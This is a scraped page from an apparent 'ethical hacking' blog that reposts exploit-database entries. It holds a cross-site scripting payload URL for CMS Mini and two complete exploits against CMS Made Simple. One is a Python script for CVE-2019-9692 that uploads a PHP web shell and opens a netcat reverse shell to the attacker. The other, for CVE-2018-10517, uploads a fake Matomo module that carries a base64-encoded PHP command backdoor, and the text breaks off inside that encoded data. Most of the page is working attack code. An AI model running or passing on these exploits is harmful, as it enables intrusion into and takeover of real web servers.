source: https://www.securityfocus.com/bid/56148/info
CMS Mini is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CMS Mini 0.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/view/index.php?path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000A3)%3C/script%3E&p=cms.guestbook&msg=Message%20sent
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863138736
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/env python
# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module
# Date: March 2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2
# Version: Showtime2 module <= 3.6.2
# Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04
# CVE : 2019-9692
import requests
import optparse
from requests_toolbelt.multipart.encoder import MultipartEncoder
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://192.168.1.10/cms)")
parser.add_option('-U', '--username', action="store", dest="username", help="Username for login", default="admin")
parser.add_option('-P', '--password', action="store", dest="password", help="Password for login", default="password")
parser.add_option('-l', '--local', action="store", dest="local", help="Local uri for reverse shell", default="localhost")
parser.add_option('-p', '--port', action="store", dest="port", help="Local port for reverse shell", default="2222")
options, args = parser.parse_args()
if not options.url:
print "[-] Specify an uri target"
exit()
if not options.username:
print "[-] Specify an username for login in administrator panel"
exit()
if not options.password:
print "[-] Specify a password for login in administrator panel"
exit()
base_uri = options.url
url_login = base_uri + "/admin/login.php"
user = options.username
password = options.password
session = requests.Session()
__c_var = ""
lhost = options.local
lport = options.port
# Login in administrator panel for get the csrf token
def login(username, password):
print "[*] Login to cms"
global __c_var
credentials = {"username": username, "password": password, "loginsubmit": "Submit"}
response = session.post(url_login, data=credentials, allow_redirects=False)
__c_var = response.headers['Location'].split("__c=")[1]
print "[*] Token value: " + __c_var
# upload a php script with reverse shell in vulnerable functionality
def upload_shell():
print "[*] Uploading webshell"
multipart_data = MultipartEncoder(
fields = {
'm1_input_browse': ('shell.php', "<?php system($_REQUEST['cmd']); ?>", 'text/plain'),
'__c': __c_var,
'mact': 'Showtime2,m1_,defaultadmin,0',
'm1_upload_submit': 'Upload'
}
)
response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data,
headers={'Content-Type': multipart_data.content_type})
# Call the script uploaded for spawn a reverse shell
def spawn_shell():
print "[*] Spawn a shell to " + lhost + ":" + str(lport)
payload = {"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + lhost + " " + str(lport) + " >/tmp/f"}
requests.post(base_uri + "/uploads/images/shell.php", data=payload)
login(user, password)
upload_shell()
spawn_shell()
# Exploit Title: CMS Made Simple 2.2.7 - Remote Code Execution
# Date: 2018-11-04
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-10517
# 1. Description:
# An attacker or a malicious user with access to the administration interface can execute code on the server.
# 2. Proof of Concept:
import requests
# target configuration (required admin credentials in order to obtain a valid session)
target_url="<YOUR HTTP(S):// URL>"
session_cookie = "<YOUR SESSION COOKIE NAME>"
session_value = "<YOUR SESSION COOKIE VALUE>"
# upload of shell unde the name of Matomo plugin
burp0_url = target_url + "/admin/moduleinterface.php"
burp0_cookies = {session_cookie: session_value}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://gk1v1ml3nfrd1bs00o69fmwnh.public2.attackdefenselabs.com/", "Content-Type": "multipart/form-data; boundary=---------------------------207726338310671742711263591267", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
burp0_data="-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"mact\"\r\n\r\nModuleManager,m1_,local_import,0\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"__c\"\r\n\r\n9a63802b6c4579cc01c\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"m1_upload\"; filename=\"test.xml\"\r\nContent-Type: text/xml\r\n\r\n<module>\n <dtdversion>1.3</dtdversion>\n <name>Matomo</name>\n <version>0.0.1</version>\n <mincmsversion>2.1.5</mincmsversion>\n <help><![CDATA[LS0gTWlzc2luZyBMYW5ndWFnZXN0cmluZzogaGVscCAtLQ==]]></help>\n <about><![CDATA[PGJyIC8+QXV0aG9yOiBleWVkZWUtbWVkaWEgJmx0O21vcnRlbkBwb3Vsc2VuLm9yZyZndDs8YnIgLz48YnIgLz5WZXJzaW9uOiAwLjAuMTxiciAvPjxiciAvPkNoYW5nZSBIaXN0b3J5OjxiciAvPi0tIE1pc3NpbmcgTGFuZ3VhZ2VzdHJpbmc6IGNoYW5nZWxvZyAtLTxiciAvPg==]]></about>\n <description><![CDATA[-- Missing Languagestring: admindescription --]]></description>\n <file>\n <filename>/</filename>\n <isdir>1</isdir>\n </file>\n <file>\n <filename>/action.admin_settings.php</filename>\n <isdir>0</isdir>\n <data><![CDATA[PCEtLSBTaW1wbGUgUEhQIEJhY2tkb29yIEJ5IERLIChPbmUtTGluZXIgVmVyc2lvbikgLS0+DQo8IS0tIFVzYWdlOiBodHRwOi8vdGFyZ2V0LmNvbS9zaW1wbGUtYmFja2Rvb3IucGhwP2NtZD1jYXQrL2V0Yy9wYXNzd2QgLS0+DQo8P3BocCBpZihpc3NldCgkX1JFUVVFU1RbJ2NtZCddKSl7IGVjaG8gIjxwcmU+IjsgJGNtZCA9ICgkX1JFUVVFU1RbJ2NtZCddKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pg==]]></data>\n </file>\n <file>\n <filename>/action.admin_statistics.php</filename>\n <isdir>0</isdir>\n <data><![CDATA[PD9waHANCmlmICghZnVuY3Rpb25fZXhpc3RzKCJjbXNtcyIpKSByZXR1cm47DQokYXBpdG9rZW4gPSR0aGlzLT5HZXRQcmVmZXJlbmNlKCJhcGl0b2tlbiIpOw0KJHNpdGVpZD0kdGhpcy0+R2V0UHJlZmVyZW5jZSgic2l0ZWlkIik7DQokbGFuZ3VhZ2U9JHRoaXMtPkdldFByZWZlcmVuY2UoImxhbmd1YWdlIiwiZW4iKTsNCg0KJGVtYmVkX2Rhc2hib2FyZCA9ICc8aWZyYW1lIHN0eWxlPSJkaXNwbGF5OmJsb2NrOyIgc3JjPSInIC4gJHRoaXMtPkdldFByZWZlcmVuY2UoImJhc2V1cmwiKQ0KICAuICcvaW5kZXgucGhwP21vZHVsZT1XaWRnZXRpemUmYWN0aW9uPWlmcmFtZSZtb2R1bGVUb1dpZGdldGl6ZT1EYXNoYm9hcmQmYWN0aW9uVG9XaWRnZXRpemU9aW5kZXgmaWRTaXRlPScgLiAkc2l0ZWlkDQogIC4gJyZ0b2tlbl9hdXRoPScgLiAkYXBpdG9rZW4NCiAgLiAnJnBlcmlvZD1tb250aCcNCiAgLiAnJmRhdGU9dG9kYXknDQogIC4gJyZsYW5ndWFnZT0nLiRsYW5ndWFnZQ0KICAuICciIGZyYW1lYm9yZGVyPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIG1hcmdpbndpZHRoPSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI4MDBweCcNCiAgLiAnIj48L2lmcmFtZT4nOw0KDQoNCmVjaG8gJGVtYmVkX2Rhc2hib2FyZDsNCg0KDQoNCi8qDQplY2hvICR0aGlzLT5TdGFydFRhYkhlYWRlcnMoKTsNCg0KZWNobyAkdGhpcy0+U2V0VGFiSGVhZGVyKCJiYXNlIiwiU2lkZXIiLCgkdGFiPT0icGFnZXMiKSk7DQplY2hvICR0aGlzLT5TZXRUYWJIZWFkZXIoInNla3Rpb25lciIsIlNla3Rpb25lciIsKCR0YWI9PSJzZWN0aW9ucyIpKTsNCi8vICBlY2hvICR0aGlzLT5TZXRUYWJIZWFkZXIoImluZHN0aWxsaW5nZXIiLCJJbmRzdGlsbGluZ2VyIiwoJHRhYj09InNldHRpbmdzIikpOw0KZWNobyAkdGhpcy0+RW5kVGFiSGVhZGVycygpOw0KDQplY2hvICR0aGlzLT5TdGFydFRhYkNvbnRlbnQoKTsNCmVjaG8gJHRoaXMtPlN0YXJ0VGFiKCJzaWRlciIpOw0KDQplY2hvICR0aGlzLT5FbmRUYWIoKTsNCg0KZWNobyAkdGhpcy0+U3RhcnRUYWIoInNla3Rpb25lciIpOw0KDQplY2hvICR0aGlzLT5FbmRUYWIoKTsNCg0KLyoNCmVjaG8gJHRoaXMtPlN0YXJ0VGFiKCJ1cGxvYWQiKTsNCiAgaW5jbHVkZV9vbmNlKGRpcm5hbWUoX19maWxlX18pLiIvdGFiLmluZHN0aWxsaW5nZXIucGhwIik7DQogIGVjaG8gJHRoaXMtPkVuZFRhYigpOw0KKi8NCi8vZWNobyAkdGhpcy0+RW5kVGFiQ29udGVudCgpOw0KDQoNCg0KLyoNCiRhcGl0b2tlbiA9JHRoaXMtPkdldFByZWZlcmVuY2UoImFwaXRva2VuIik7DQokc2l0ZWlkPSR0aGlzLT5HZXRQcmVmZXJlbmNlKCJzaXRlaWQiKTsNCg0KLy8gd2UgY2FsbCB0aGUgUkVTVCBBUEkgYW5kIHJlcXVlc3QgdGhlIDEwMCBmaXJzdCBrZXl3b3JkcyBmb3IgdGhlIGxhc3QgbW9udGggZm9yIHRoZSBpZHNpdGU9Nw0KJHVybCA9ICR0aGlzLT5HZXRQcmVmZXJlbmNlKCJiYXNldXJsIik7DQokdXJsIC49ICI/bW9kdWxlPUFQSSZtZXRob2Q9UmVmZXJyZXJzLmdldEtleXdvcmRzIjsNCiR1cmwgLj0gIiZpZFNpdGU9JHNpdGVpZCZwZXJpb2Q9bW9udGgmZGF0ZT15ZXN0ZXJkYXkiOw0KJHVybCAuPSAiJmZvcm1hdD1QSFAmZmlsdGVyX2xpbWl0PTIwIjsNCiR1cmwgLj0gIiZ0b2tlbl9hdXRoPSRhcGl0b2tlbiI7DQoNCiRmZXRjaGVkID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7DQovL2VjaG8gJGZldGNoZWQ7cmV0dXJuOw0KJGNvbnRlbnQgPSB1bnNlcmlhbGl6ZSgkZmV0Y2hlZCk7DQovL3ByaW50X3IoJGNvbnRlbnQpO3JldHVybjsNCg0KLy8gY2FzZSBlcnJvcg0KaWYgKCEkY29udGVudCkgew0KICBwcmludCgiRXJyb3IgcGFyc2luZyBkYXRhLCBjb250ZW50IGZldGNoZWQgPSAiIC4gJGZldGNoZWQpOw0KICByZXR1cm47DQp9DQoNCmlmICgkY29udGVudFsicmVzdWx0Il09PSJlcnJvciIpIHsNCiAgcHJpbnQoIkVycm9yLCBtZXNzYWdlID0gIiAuICRjb250ZW50WyJtZXNzYWdlIl0pOw0KICByZXR1cm47DQp9DQoNCnByaW50KCI8aDE+S2V5d29yZHMgZm9yIHRoZSBsYXN0IG1vbnRoPC9oMT5cbiIpOw0KZm9yZWFjaCAoJGNvbnRlbnQgYXMgJHJvdykgew0KICAka2V5d29yZCA9IGh0bWxzcGVjaWFsY2hhcnMoaHRtbF9lbnRpdHlfZGVjb2RlKHVybGRlY29kZSgkcm93WydsYWJlbCddKSwgRU5UX1FVT1RFUywgJ1VURi04JyksIEVOVF9RVU9URVMsICdVVEYtOCcpOw0KICAkaGl0cyA9ICRyb3dbJ25iX3Zpc2l0cyddOw0KDQogIHByaW50KCI8Yj4ka2V5d29yZDwvYj4gKCRoaXRzIGhpdHMpPGJyPlxuIik7DQp9DQoqLw0K]]></data>\n </file>\n <file>\n <filename>/action.default.php</filename>\n <isdir>0</isdir>\n <data><![CDATA[PD9waHANCg0KZWNobyAkdGhpcy0+TmVvUHJvY2Vzc1RlbXBsYXRlRnJvbURhdGEoJHRoaXMtPkdldFRyYWNraW5nQ29kZSgpKTs=]]></data>\n </file>\n <file>\n <filename>/action.savesettings.php</filename>\n <isdir>0</isdir>\n <data><![CDATA[PD9waHANCmlmICghZnVuY3Rpb25fZXhpc3RzKCJjbXNtcyIpKSByZXR1cm47DQppZiggISR0aGlzLT5DaGVja1Blcm1pc3Npb24oJ01vZGlmeSBTaXRlIFByZWZlcmVuY2VzJykgKSByZXR1cm47DQoNCg0KJHRoaXMtPk5lb1NhdmVWYWx1ZXMoJHBhcmFtcyxhcnJheSgNCiAgImJhc2V1cmwiLA0KICAidHJhY2tpbmdjb2RlIiwNCiAgImFwaXRva2VuIiwNCiAgInNpdGVpZCINCikpOw0KDQokdGhpcy0+UmVkaXJlY3QoJGlkLCAnYWRtaW5fc2V0dGluZ3MnLCAkcmV0dXJuaWQsYXJyYXkoInRhYiI9PiJzZXR0aW5ncyIsIm1vZHVsZV9tZXNzYWdlIj0+JHRoaXMtPkxhbmcoInNldHRpbmdzc2F2ZWQiKSkpOw0K]]></data>\n </file>\n <file>\n <filename>/lang/</filename>\n <isdir>1</isdir>\n </file>\n <file>\n <filename>/lang/en_US.php</filename>\n <isdir>0</isdir>\n <data><![CDATA[PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIFVzZXI6IG1vcnRlbg0KICogRGF0ZTogMjctMDktMjAxOA0KICogVGltZTogMDg6NTMNCiAqLw0KDQoNCiRsYW5nWyJ0aXRsZV9zdGF0aXN0aWNzIl09Ik1hdG9tbyBTdGF0aXN0aWNzIjsNCiRsYW5nWyJ0aXRsZV9zZXR0aW5ncyJdPSJNYXRvbW8gU2V0dGluZ3MiOw0KDQokbGFuZ1siYmFzZXVybCJdPSJCYXNlIFVSTCI7DQokbGFuZ1siYmFzZXVybGhlbHAiXT0iVGhlIGJhc2UgdXJsIG9mIHRoZSBNYXRvbW8taW5zdGFsbGF0aW9uLiBQbGVhc2UgaW5jbHVkZSBodHRwOi8vIG9yIGh0dHBzOi8vIjsNCiRsYW5nWyJhcGl0b2tlbiJdPSJBUEkgdG9rZW4iOw0KJGxhbmdbImFwaXRva2VuaGVscCJdPSJUaGUgQVBJIHRva2VuIGZvciBhY2Nlc3NpbmcgTWF0b21vLiBDYW4gYmUgb2J0YWluZWQgYWZ0ZXIgbG9nZ2luZyBpbnRvIHRoZSBNYXRvbW8gaW5zdGFsbGF0aW9uIjsNCiRsYW5nWyJzaXRlaWQiXT0iU2l0ZSBJRCI7DQokbGFuZ1sic2l0ZWlkaGVscCJdPSJUaGUgSUQgb2YgdGhlIHNpdGUgYXMgc2VlbiBieSB0aGUgTWF0b21vIGluc3RhbGxhdGlvbiI7DQokbGFuZ1sidHJhY2tpbmdjb2RlIl09IlRyYWNraW5nIGNvZGUiOw0KJGxhbmdbInRyYWNraW5nY29kZWhlbHAiXT0iVGhlIHRyYWNraW5nIGNvZGUgZnJvbSBNYXRvbW8gKHRoaXMgd2lsbCBwcm9iYWJseSBiZSBhdXRvZ2VuZXJhdGVkIGF0IGEgbGF0ZXIgdmVyc2lvbikiOw0KJGxhbmdbInNhdmVzZXR0aW5ncyJdPSJTYXZlIHNldHRpbmdzIjsNCiRsYW5nWyJzZXR0aW5nc3NhdmVkIl09IlNldHRpbmdzIHNhdmVkIjs=]]></data>\n </file>\n <file>\n <filename>/Matomo.module.php</filename>\n <isdir>0</isdir>\n <data><![CDATA[PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIFVzZXI6IG1vcnRlbg0KICogRGF0ZTogMjctMDktMjAxOA0KICogVGltZTogMDg6NTANCiAqLw0KDQoNCmNsYXNzIE1hdG9tbyBleHRlbmRzIENNU01vZHVsZQ0Kew0KDQogIC8qKg0KICAgKg0KICAgKiBAdmFyIHN0cmluZw0KICAgKi8NCiAgcHJvdGVjdGVkICRtZXRhZGF0YSA9IG51bGw7DQogIHByb3RlY3RlZCAkX19lcnJvcnMgPSBudWxsOw0KICBwcm90ZWN0ZWQgJF9fbWVzc2FnZXMgPSBudWxsOw0KDQogIC8qICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiogQ09OU1RSVUNUT1IgKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiAqLw0KICBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoKQ0KICB7DQogICAgcGFyZW50OjpfX2NvbnN0cnVjdCgpOw0KDQogICAgLypzcGxfYXV0b2xvYWRfcmVnaXN0ZXIoYXJyYXkoDQogICAgICAmJHRoaXMsDQogICAgICAnX2F1dG9sb2FkZXInDQogICAgKSk7DQoNCiAgICAkc21hcnR5ID0gU21hcnR5X0NNUzo6Z2V0X2luc3RhbmNlKCk7DQogICAgaWYgKCRzbWFydHkpIHsNCiAgICAgICRzbWFydHktPnJlZ2lzdGVyQ2xhc3MoJ2htX3NtYXJ0eScsICdITV9TbWFydHknKTsNCiAgICAgICRzbWFydHktPnJlZ2lzdGVyUmVzb3VyY2UoJ2htX3RwbCcsIG5ldyBITV9UZW1wbGF0ZVJlc291cmNlKCkpOw0KICAgIH0qLw0KICB9DQoNCiAgLyoqDQogICAqIEEgc2ltcGxlIGF1dG9sb2FkZXIgZm9yIGNsYXNzIGZpbGVzLg0KICAgKg0KICAgKiBAcGFyYW0gc3RyaW5nICRuYW1lIGNsYXNzIG5hbWUNCiAgICovDQogIC8qcHJpdmF0ZSBmaW5hbCBmdW5jdGlvbiBfYXV0b2xvYWRlcigkbmFtZSkNCiAgew0KICAgICRjbGFzc0ZpbGUgPSAkdGhpcy0+R2V0TW9kdWxlUGF0aCgpIC4gJy9saWIvJyAuIHN0cl9yZXBsYWNlKCdfJywgJy8nLCAkbmFtZSkgLiAnLnBocCc7DQogICAgaWYgKGZpbGVfZXhpc3RzKCRjbGFzc0ZpbGUpKSB7DQogICAgICByZXF1aXJlX29uY2UgJGNsYXNzRmlsZTsNCiAgICB9DQogIH0qLw0KDQogIC8qICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiogTU9EVUxFIENPTkZJRyAqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqICovDQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpHZXRGcmllbmRseU5hbWUoKQ0KICAgKi8NCiAgcHVibGljIGZ1bmN0aW9uIEdldEZyaWVuZGx5TmFtZSgpDQogIHsNCiAgICByZXR1cm4gJHRoaXMtPkxhbmcoJ2ZyaWVuZGx5bmFtZScpOw0KICB9DQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpHZXRWZXJzaW9uKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBHZXRWZXJzaW9uKCkNCiAgew0KICAgIHJldHVybiAnMC4wLjEnOw0KICB9DQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpNaW5pbXVtQ01TVmVyc2lvbigpDQogICAqLw0KICBwdWJsaWMgZnVuY3Rpb24gTWluaW11bUNNU1ZlcnNpb24oKQ0KICB7DQogICAgcmV0dXJuICIyLjEuNSI7DQogIH0NCg0KICAvKg0KICAgKiAobm9uLVBIUGRvYykgQHNlZSBDTVNNb2R1bGU6Ok1heGltdW1DTVNWZXJzaW9uKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBNYXhpbXVtQ01TVmVyc2lvbigpDQogIHsNCiAgICByZXR1cm4gIjMiOw0KICB9DQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpHZXRIZWxwKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBHZXRIZWxwKCkNCiAgew0KICAgIHJldHVybiAkdGhpcy0+TGFuZygnaGVscCcpOw0KICB9DQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpHZXRBdXRob3IoKQ0KICAgKi8NCiAgcHVibGljIGZ1bmN0aW9uIEdldEF1dGhvcigpDQogIHsNCiAgICByZXR1cm4gJ2V5ZWRlZS1tZWRpYSc7DQogIH0NCg0KICAvKg0KICAgKiAobm9uLVBIUGRvYykgQHNlZSBDTVNNb2R1bGU6OkdldEF1dGhvckVtYWlsKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBHZXRBdXRob3JFbWFpbCgpDQogIHsNCiAgICByZXR1cm4gJ21vcnRlbkBwb3Vsc2VuLm9yZyc7DQogIH0NCg0KICAvKg0KICAgKiAobm9uLVBIUGRvYykgQHNlZSBDTVNNb2R1bGU6OkdldENoYW5nZUxvZygpDQogICAqLw0KICBwdWJsaWMgZnVuY3Rpb24gR2V0Q2hhbmdlTG9nKCkNCiAgew0KICAgIHJldHVybiAkdGhpcy0+TGFuZygnY2hhbmdlbG9nJyk7DQogIH0NCg0KICAvKg0KICAgKiAobm9uLVBIUGRvYykgQHNlZSBDTVNNb2R1bGU6OklzUGx1Z2luTW9kdWxlKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBJc1BsdWdpbk1vZHVsZSgpDQogIHsNCiAgICByZXR1cm4gdHJ1ZTsNCiAgfQ0KDQogIC8qDQogICAqIChub24tUEhQZG9jKSBAc2VlIENNU01vZHVsZTo6SGFzQWRtaW4oKQ0KICAgKi8NCiAgcHVibGljIGZ1bmN0aW9uIEhhc0FkbWluKCkNCiAgew0KICAgIHJldHVybiB0cnVlOw0KICB9DQoNCiAgLyoNCiAgICogKG5vbi1QSFBkb2MpIEBzZWUgQ01TTW9kdWxlOjpHZXRBZG1pbkRlc2NyaXB0aW9uKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBHZXRBZG1pbkRlc2NyaXB0aW9uKCkNCiAgew0KICAgIHJldHVybiAkdGhpcy0+TGFuZygnYWRtaW5kZXNjcmlwdGlvbicpOw0KICB9DQoNCiAgcHVibGljIGZ1bmN0aW9uIEdldEFkbWluTWVudUl0ZW1zKCkNCiAgew0KICAgICRvdXQgPSBhcnJheSgpOw0KDQogICAgJG9iaiA9IG5ldyBDbXNBZG1pbk1lbnVJdGVtKCk7DQogICAgJG9iai0+bW9kdWxlID0gJHRoaXMtPkdldE5hbWUoKTsNCiAgICAkb2JqLT5zZWN0aW9uID0gJ2V4dGVuc2lvbnMnOw0KICAgICRvYmotPnRpdGxlID0gJHRoaXMtPkxhbmcoJ3RpdGxlX3N0YXRpc3RpY3MnKTsNCiAgICAkb2JqLT5kZXNjcmlwdGlvbiA9ICR0aGlzLT5MYW5nKCdkZXNjX3N0YXRpc3RpY3MnKTsNCiAgICAkb2JqLT5hY3Rpb24gPSAnYWRtaW5fc3RhdGlzdGljcyc7DQogICAgJG9iai0+dXJsID0gJHRoaXMtPmNyZWF0ZV91cmwoJ20xXycsICRvYmotPmFjdGlvbik7DQogICAgJG9iai0+cHJpb3JpdHkgPSA1MDsNCiAgICAkb3V0W10gPSAkb2JqOw0KDQogICAgaWYgKCR0aGlzLT5DaGVja1Blcm1pc3Npb24oJ01vZGlmeSBTaXRlIFByZWZlcmVuY2VzJykpIHsNCiAgICAgICRvYmogPSBuZXcgQ21zQWRtaW5NZW51SXRlbSgpOw0KICAgICAgJG9iai0+bW9kdWxlID0gJHRoaXMtPkdldE5hbWUoKTsNCiAgICAgICRvYmotPnNlY3Rpb24gPSAnc2l0ZWFkbWluJzsNCiAgICAgICRvYmotPnRpdGxlID0gJHRoaXMtPkxhbmcoJ3RpdGxlX3NldHRpbmdzJyk7DQogICAgICAkb2JqLT5kZXNjcmlwdGlvbiA9ICR0aGlzLT5MYW5nKCdkZXNjX3NldHRpbmdzJyk7DQogICAgICAkb2JqLT5hY3Rpb24gPSAnYWRtaW5fc2V0dGluZ3MnOw0KICAgICAgJG9iai0+dXJsID0gJHRoaXMtPmNyZWF0ZV91cmwoJ20xXycsICRvYmotPmFjdGlvbik7DQogICAgICAkb3V0W10gPSAkb2JqOw0KICAgICAgJG9iai0+cHJpb3JpdHkgPSA1MDsNCiAgICB9DQogICAgcmV0dXJuICRvdXQ7DQogIH0NCg0KICBwdWJsaWMgZnVuY3Rpb24gSW5pdGlhbGl6ZUFkbWluICgpDQogIHt9DQoNCiAgLyoqDQogICAqIChub24tUEhQZG9jKQ0KICAgKg0KICAgKiBAc2VlIENNU01vZHVsZTo6SW5pdGlhbGl6ZUZyb250ZW5kKCkNCiAgICovDQogIHB1YmxpYyBmdW5jdGlvbiBJbml0aWFsaXplRnJvbnRlbmQgKCkNCiAgew0KICAgICR0aGlzLT5SZWdpc3Rlck1vZHVsZVBsdWdpbigpOw0KDQogIC8qICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCd1c2VyJywgbnVsbCwgJHRoaXMtPkxhbmcoJ2hlbHBfdXNlcicpKTsNCiAgICAkdGhpcy0+U2V0UGFyYW1ldGVyVHlwZSgndXNlcicsIENMRUFOX0lOVCk7DQoNCiAgICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCdtb2RlbCcsIG51bGwsICR0aGlzLT5MYW5nKCdoZWxwX21vZGVsJykpOw0KICAgICR0aGlzLT5TZXRQYXJhbWV0ZXJUeXBlKCdtb2RlbCcsIENMRUFOX0lOVCk7DQoNCiAgICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCd0ZW1wbGF0ZScsIG51bGwsICR0aGlzLT5MYW5nKCdoZWxwX3RlbXBsYXRlJykpOw0KICAgICR0aGlzLT5TZXRQYXJhbWV0ZXJUeXBlKCd0ZW1wbGF0ZScsIENMRUFOX1NUUklORyk7DQoNCiAgICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCd0YXJnZXQnLCBudWxsLCAkdGhpcy0+TGFuZygnaGVscF90YXJnZXQnKSk7DQogICAgJHRoaXMtPlNldFBhcmFtZXRlclR5cGUoJ3RhcmdldCcsIENMRUFOX1NUUklORyk7DQoNCiAgICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCdwYWdlbGltaXQnLCBudWxsLCAkdGhpcy0+TGFuZygnaGVscF9wYWdlbGltaXQnKSk7DQogICAgJHRoaXMtPlNldFBhcmFtZXRlclR5cGUoJ3BhZ2VsaW1pdCcsIENMRUFOX0lOVCk7DQoNCiAgICAkdGhpcy0+Q3JlYXRlUGFyYW1ldGVyKCdwYWdlJywgbnVsbCwgJHRoaXMtPkxhbmcoJ2hlbHBfcGFnZScpKTsNCiAgICAkdGhpcy0+U2V0UGFyYW1ldGVyVHlwZSgncGFnZScsIENMRUFOX0lOVCk7Ki8NCg0KDQogIH0NCg0KDQogIGZ1bmN0aW9uIE5lb1Byb2Nlc3NUZW1wbGF0ZSgkZmlsZW5hbWUpDQogIHsNCiAgICBpZiAoZmlsZV9leGlzdHMoZGlybmFtZShfX0ZJTEVfXykgLiAiL3RlbXBsYXRlcy8iIC4gJGZpbGVuYW1lKSkgew0KICAgICAgJGRhdGEgPSBmaWxlX2dldF9jb250ZW50cyhkaXJuYW1lKF9fRklMRV9fKSAuICIvdGVtcGxhdGVzLyIgLiAkZmlsZW5hbWUpOw0KICAgICAgLy9lY2hvICJkYXRhOiIuJGRhdGE7DQogICAgICByZXR1cm4gJHRoaXMtPk5lb1Byb2Nlc3NUZW1wbGF0ZUZyb21EYXRhKCRkYXRhKTsNCiAgICB9IGVsc2Ugew0KICAgICAgZWNobyAiSW52YWxpZCB0ZW1wbGF0ZSBmaWxlbmFtZTogIiAuICRmaWxlbmFtZTsNCiAgICB9DQogICAgcmV0dXJuICIiOw0KICB9DQoNCiAgZnVuY3Rpb24gTmVvUHJvY2Vzc1RlbXBsYXRlRnJvbURhdGEoJGRhdGEpDQogIHsNCiAgICAkc21hcnR5ID0gU21hcnR5X0NNUzo6Z2V0X2luc3RhbmNlKCk7DQogICAgcmV0dXJuICRzbWFydHktPmZldGNoKCJzdHJpbmc6IiAuICRkYXRhKTsNCg0KICB9DQoNCiAgZnVuY3Rpb24gR2V0VHJhY2tpbmdDb2RlKCkNCiAgew0KICAgIHJldHVybiAkdGhpcy0+R2V0UHJlZmVyZW5jZSgidHJhY2tpbmdjb2RlIik7DQogIH0NCg0KDQogIGZ1bmN0aW9uIE5lb1NhdmVWYWx1ZXMoJHBhcmFtcywkdmFsdWVzLCRoYW5kbGV1bnNldD0iY2xlYXIiKSB7DQogICAgLy9lY2hvICJoaSI7ZGllKCk7DQogICAgaWYgKCFpc19hcnJheSgkdmFsdWVzKSkgew0KICAgICAgaWYgKGlzc2V0KCRwYXJhbXNbJHZhbHVlc10pKSB7DQogICAgICAgICR0aGlzLT5TZXRQcmVmZXJlbmNlKCR2YWx1ZXMsJHBhcmFtc1skdmFsdWVzXSk7DQogICAgICB9IGVsc2Ugew0KICAgICAgICBzd2l0Y2ggKCRoYW5kbGV1bnNldCkgew0KICAgICAgICAgIGNhc2UgImNsZWFyIiA6ICR0